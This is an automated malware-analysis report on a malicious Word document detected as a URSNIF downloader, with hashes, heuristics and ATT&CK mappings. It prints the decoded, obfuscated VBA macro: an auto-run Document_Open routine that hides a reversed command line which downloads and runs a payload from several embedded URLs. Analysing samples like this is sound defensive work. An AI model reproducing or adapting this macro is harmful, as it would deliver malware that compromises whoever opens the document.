Office (OLE) malware analysis — malicious · 75a3e9e691edff74

MALICIOUS

Office (OLE)

50.9 KB Created: 2018-09-06 21:38:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: d157a22ea44e53e8a9631b891d98e0aa SHA-1: 33bb40a083254f517e6dbe2bb088d447f5fa3916 SHA-256: 75a3e9e691edff74c9ae2e14e10465ef2dfd35d89727030a0b34f1bcc32081c9

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute a command. This indicates an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader functionality.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5881 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5881 bytes
SHA-256: `df11fc60acbac41a57bc64d66f5740fc1092528d7b36352213c6378ec196df17`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fUpwStmZnn" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Shell Format(hKlzJ) + FSTNvhNIuE + KjrCIMnTOBfT + VpvhQvW + vDOaJwfL + zzuHvTpjLkHFJ + DsIRYjYqIclWj, vbHide End Sub Attribute VB_Name = "EmzdDiNO" Function VpvhQvW() On _ Error _ Resume _ Next Month "306832326" + "2276" + "4515" + "cqWlZCOsf" Month "wQ" + "h" Month "jZm" + "wEM" + "zp" + "plLq" Month "hmvkwvNvN" + "513658551" zhWwrRmji = Chr(4 + 16 + 1 + 11 + 67) + "m" + "d" + " /V^" + ":/" + Chr(2 + 11 + 0 + 7 + 47) + Chr(1 + 5 + 0 + 3 + 25) + "^s" + "^et N^" + "l= ^ " + "^" + " " + "^" + " ^" + " ^ ^ " + " ^ ^ ^" Month "H" + "3724" Month "237178108" + "hJcz" Month "nA" + "ZifTKsA" + "961" + "ldYSl" cbSSDPu = " ^}}" + "{h" + Chr(4 + 16 + 1 + 11 + 67) + "t^a" + Chr(4 + 16 + 1 + 11 + 67) + "};^k^" + "a" Month "h" + "HPpFjcw" + "d" + "1425" Month "YIwDoktSpVkFHQ" + "h" Month "447502889" + "CpaucRmTws" + "288553812" + "ZUUiVfww" Month "406071" + "251621467" + "OUfl" + "UzDWKPhri" JTiutDKq = "^er^" + "b;" + "^" + "lAs^$ " + "^" + "m^e^t" + "I-^e^k" + "^o" + "vnI" Month "VuIhznPZiZr" + "mpWHn" + "iDiaNvZjuvGGiA" + "uSDPbzQZKLswtw" Month "JQhzpJuhMH" + "3563" fZjnjzv = ";)^l^A^" + "s$ " + "^,J^E" + "^l^" + "$" + "(^eli^" + "Fda^oln" + "^w^" + "o^D" Month "214253161" + "Tbrrdr" + "3744" + "457599967" Month "453158194" + "rMAR" + "TPUzjl" + "Lwq" NMZTGzc = ".^h^D" + Chr(2 + 11 + 0 + 7 + 47) + "^${^y" + "r^t{)P" + "^" + "Xw$^ " + "ni J^E^" + "l$(" + "^h" + Chr(4 + 16 + 1 + 11 + 67) + "ae" Month "529825017" + "395445515" + "124040134" + "l" Month "3948" + "CTlY" + "205265453" + "109680846" AiWYCSzYjZo = "r^o^" + "f^;'e^x" + "^e^.'^+" + "^Z" + "k" + "^j$+'" + "\'^+" + Chr(4 + 16 + 1 + 11 + 67) + "il^b^up" Month "BGQGrRR" + "6216" zCifUQwAoKw = "^:vne^" + "$^=^" + "l" + "A" + "^s^$" + "^;^'^7" + "5^7'" + " ^=" + "^ ^Zk" + "j$^;)^" Month "LpiNPb" + "431315642" + "MIW" + "338130703" Month "6993" + "6534" + "qTFzzptPtYdj" + "rQintf" Month "Uw" + "tInrJLwTzKQwA" + "UcKRnmMw" + "XLzZOrwWWUKFo" mFhYGaSA = "'^@" + "^'(ti" + "^l^p^" + "S^" + ".^'^U^" + "k" Month "5530" + "ZDcCjMjvOPjMm" Month "262" + "i" + "746" + "JiJaT" Month "9697" + "9362" Month "nfaIMFKC" + "lzrTi" Month "6228" + "357" + "znu" + "132358548" RCXqpikdc = "^ER^3^H" + "H/m^o" + Chr(4 + 16 + 1 + 11 + 67) + "^" + ".relr^e" + "b^a" + "^hg" Month "am" + "tvthjV" + "rmHtcT" + "bBhfdSps" Month "111036881" + "pI" zwDAzp = "a^dna" + "m^" + "a^s/" + "/:^pt^" + "t^h" + "^@^" + "o9^" + "Z^x^" Month "zUfAnAuGC" + "WWioofXS" Month "dTEU" + "dEn" + "TJQVjPRAjWv" + "CiOG" Month "378273757" + "8480" + "1241" + "213661587" NVlirQWIiwz = "fGlJ/^" + "s^d" + "a^o^l^p" + "^u/^t" + "n^" + "e" + "tn^o" VpvhQvW = zhWwrRmji + cbSSDPu + JTiutDKq + fZjnjzv + NMZTGzc + AiWYCSzYjZo + zCifUQwAoKw + mFhYGaSA + RCXqpikdc + zwDAzp + NVlirQWIiwz Month "pdK" + "129306007" + "994" + "GXXHwVhfjTqo" Month "AoLl" + "bapqNXwHTJSVQa" End Function Function vDOaJwfL() On _ Error _ Resume _ Next Month "2662" + "L" + "Bs" + "2137" Month "9703" + "fNlJzj" + "530833799" + "VWEwUl" Month "9193" + "D" + "urp" + "XA" qkaCZSLpj = Chr(4 + 16 + 1 + 11 + 67) + "^-" + "^p" + "^w" + "/t^en.n" + "^g^" + "is^e^" + "d^3^e" + Chr(4 + 16 + 1 + 11 + 67) + "^" + "ap" + "s//^:pt" Month "A" + "57738532" Month "NIuz" + "U" + "M" + "5873" mMzONUwZE = "th@I^" + "68am^" + "S^" + "9" + "/^l^p^" + ".t" + "e" + "n^.^sm" + "^pt" + "//:^" + "pt" Month "284064698" + "VD" + "iHc" + "420691287" Month "3972" + "w" + "jH" + "mKLOcfrRJ" Month "bVsT" + "1490" Month "H" + "rjSCCfurtLos" + "7224" + "rICtSUNCBwO" papqhQRlPCn = "^t^" + "h@n9q" + "u6g" + "k" + "/mo" + Chr(4 + 16 + 1 + 11 + 67) + ".^ze^l^" + "l^a^tn^" + "a//:" + "p^t" + "^th^@U^" + "U^w^" ... (truncated)

SHA-256: df11fc60acbac41a57bc64d66f5740fc1092528d7b36352213c6378ec196df17

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fUpwStmZnn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(hKlzJ) + FSTNvhNIuE + KjrCIMnTOBfT + VpvhQvW + vDOaJwfL + zzuHvTpjLkHFJ + DsIRYjYqIclWj, vbHide
End Sub



Attribute VB_Name = "EmzdDiNO"
Function VpvhQvW()

On _
Error _
Resume _
Next
Month "306832326" + "2276" + "4515" + "cqWlZCOsf"
   Month "wQ" + "h"
   Month "jZm" + "wEM" + "zp" + "plLq"
   Month "hmvkwvNvN" + "513658551"
zhWwrRmji = Chr(4 + 16 + 1 + 11 + 67) + "m" + "d" + " /V^" + ":/" + Chr(2 + 11 + 0 + 7 + 47) + Chr(1 + 5 + 0 + 3 + 25) + "^s" + "^et N^" + "l= ^ " + "^" + " " + "^" + "     ^" + " ^ ^   " + " ^ ^ ^"
Month "H" + "3724"
   Month "237178108" + "hJcz"
   Month "nA" + "ZifTKsA" + "961" + "ldYSl"
cbSSDPu = " ^}}" + "{h" + Chr(4 + 16 + 1 + 11 + 67) + "t^a" + Chr(4 + 16 + 1 + 11 + 67) + "};^k^" + "a"
Month "h" + "HPpFjcw" + "d" + "1425"
   Month "YIwDoktSpVkFHQ" + "h"
   Month "447502889" + "CpaucRmTws" + "288553812" + "ZUUiVfww"
   Month "406071" + "251621467" + "OUfl" + "UzDWKPhri"
JTiutDKq = "^er^" + "b;" + "^" + "lAs^$ " + "^" + "m^e^t" + "I-^e^k" + "^o" + "vnI"
Month "VuIhznPZiZr" + "mpWHn" + "iDiaNvZjuvGGiA" + "uSDPbzQZKLswtw"
   Month "JQhzpJuhMH" + "3563"
fZjnjzv = ";)^l^A^" + "s$ " + "^,J^E" + "^l^" + "$" + "(^eli^" + "Fda^oln" + "^w^" + "o^D"
Month "214253161" + "Tbrrdr" + "3744" + "457599967"
   Month "453158194" + "rMAR" + "TPUzjl" + "Lwq"
NMZTGzc = ".^h^D" + Chr(2 + 11 + 0 + 7 + 47) + "^${^y" + "r^t{)P" + "^" + "Xw$^ " + "ni J^E^" + "l$(" + "^h" + Chr(4 + 16 + 1 + 11 + 67) + "ae"
Month "529825017" + "395445515" + "124040134" + "l"
   Month "3948" + "CTlY" + "205265453" + "109680846"
AiWYCSzYjZo = "r^o^" + "f^;'e^x" + "^e^.'^+" + "^Z" + "k" + "^j$+'" + "\'^+" + Chr(4 + 16 + 1 + 11 + 67) + "il^b^up"
Month "BGQGrRR" + "6216"
zCifUQwAoKw = "^:vne^" + "$^=^" + "l" + "A" + "^s^$" + "^;^'^7" + "5^7'" + " ^=" + "^ ^Zk" + "j$^;)^"
Month "LpiNPb" + "431315642" + "MIW" + "338130703"
   Month "6993" + "6534" + "qTFzzptPtYdj" + "rQintf"
   Month "Uw" + "tInrJLwTzKQwA" + "UcKRnmMw" + "XLzZOrwWWUKFo"
mFhYGaSA = "'^@" + "^'(ti" + "^l^p^" + "S^" + ".^'^U^" + "k"
Month "5530" + "ZDcCjMjvOPjMm"
   Month "262" + "i" + "746" + "JiJaT"
   Month "9697" + "9362"
   Month "nfaIMFKC" + "lzrTi"
   Month "6228" + "357" + "znu" + "132358548"
RCXqpikdc = "^ER^3^H" + "H/m^o" + Chr(4 + 16 + 1 + 11 + 67) + "^" + ".relr^e" + "b^a" + "^hg"
Month "am" + "tvthjV" + "rmHtcT" + "bBhfdSps"
   Month "111036881" + "pI"
zwDAzp = "a^dna" + "m^" + "a^s/" + "/:^pt^" + "t^h" + "^@^" + "o9^" + "Z^x^"
Month "zUfAnAuGC" + "WWioofXS"
   Month "dTEU" + "dEn" + "TJQVjPRAjWv" + "CiOG"
   Month "378273757" + "8480" + "1241" + "213661587"
NVlirQWIiwz = "fGlJ/^" + "s^d" + "a^o^l^p" + "^u/^t" + "n^" + "e" + "tn^o"
VpvhQvW = zhWwrRmji + cbSSDPu + JTiutDKq + fZjnjzv + NMZTGzc + AiWYCSzYjZo + zCifUQwAoKw + mFhYGaSA + RCXqpikdc + zwDAzp + NVlirQWIiwz
   Month "pdK" + "129306007" + "994" + "GXXHwVhfjTqo"
   Month "AoLl" + "bapqNXwHTJSVQa"
End Function
Function vDOaJwfL()

On _
Error _
Resume _
Next
Month "2662" + "L" + "Bs" + "2137"
   Month "9703" + "fNlJzj" + "530833799" + "VWEwUl"
   Month "9193" + "D" + "urp" + "XA"
qkaCZSLpj = Chr(4 + 16 + 1 + 11 + 67) + "^-" + "^p" + "^w" + "/t^en.n" + "^g^" + "is^e^" + "d^3^e" + Chr(4 + 16 + 1 + 11 + 67) + "^" + "ap" + "s//^:pt"
Month "A" + "57738532"
   Month "NIuz" + "U" + "M" + "5873"
mMzONUwZE = "th@I^" + "68am^" + "S^" + "9" + "/^l^p^" + ".t" + "e" + "n^.^sm" + "^pt" + "//:^" + "pt"
Month "284064698" + "VD" + "iHc" + "420691287"
   Month "3972" + "w" + "jH" + "mKLOcfrRJ"
   Month "bVsT" + "1490"
   Month "H" + "rjSCCfurtLos" + "7224" + "rICtSUNCBwO"
papqhQRlPCn = "^t^" + "h@n9q" + "u6g" + "k" + "/mo" + Chr(4 + 16 + 1 + 11 + 67) + ".^ze^l^" + "l^a^tn^" + "a//:" + "p^t" + "^th^@U^" + "U^w^"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.